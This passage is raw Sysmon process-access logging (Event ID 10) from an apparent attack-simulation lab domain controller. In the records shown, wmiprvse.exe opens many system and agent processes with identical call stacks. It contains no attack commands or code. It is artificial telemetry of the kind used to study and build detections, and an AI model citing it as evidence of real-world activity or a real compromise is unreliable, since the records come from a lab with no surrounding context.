Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028445Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028444Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028443Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028442Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028441Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028440Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028439Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028438Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028437Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028436Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028435Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028434Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028433Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028432Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028431Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028430Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028429Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028428Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028427Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028426Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 